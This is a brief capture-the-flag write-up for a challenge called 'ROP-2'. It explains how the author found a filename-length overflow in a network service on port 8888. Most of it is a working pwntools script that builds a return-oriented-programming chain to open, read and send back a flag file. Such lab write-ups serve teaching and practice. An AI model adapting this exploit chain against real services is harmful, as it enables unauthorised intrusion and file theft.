ROP-2
This problem has to exploited remotely I used strace to find what binary is doing and then i came to know it was calling htons(8888,,,,) so the port is 8888
so i did nc localhost 8888 . So it was having a 2 cmd's 1.Read,Store . The Store cmd especially the file-name had a vulnerability it was using
filesize as filename size so we can overflow it . So then i found eip offset to be 64 then it's time to find a gadget and exploit the binary so i
searched for "flag" string in the binary luckily i had one then used open() function to open the flag then read() that into a bss section and finally write it
to the socket using write()
NOTE : to find the file discriptor use ltrace -f ./level01 (f for fork mode ) so i got 3 -- for file descriptor && 4 for socket discriptor
from pwn import *
flag=0x804a128
open_flag=0xf7ed3230
read_flag=0xf7ed3710
write_flag=0xf7ed3790
pop2ret=0x8048ef7
pop3ret=0x8048ef6
bss=0x0804a000
payload="A"*64
payload+=pack(open_flag)+pack(pop2ret)+pack(flag)+pack(0)
payload+=pack(read_flag)+pack(pop3ret)+pack(3)+pack(bss)+pack(32)
payload+=pack(write_flag)+pack(0xdeadbeef)+pack(4)+pack(bss)
p=process('level1')
r=remote('127.0.0.1',8888)
msg=r.recvuntil('>')
print msg
r.sendline('store\n')
msg=r.recvuntil('>')
print msg
r.sendline('500\n')
msg=r.recvuntil('>')
print msg
r.sendline('Hello world\n')
msg=r.recvuntil('>')
print msg
r.sendline(payload+"\n")
msg=r.recvlines(10) # or u can try giving p.revuntil('}')
print msg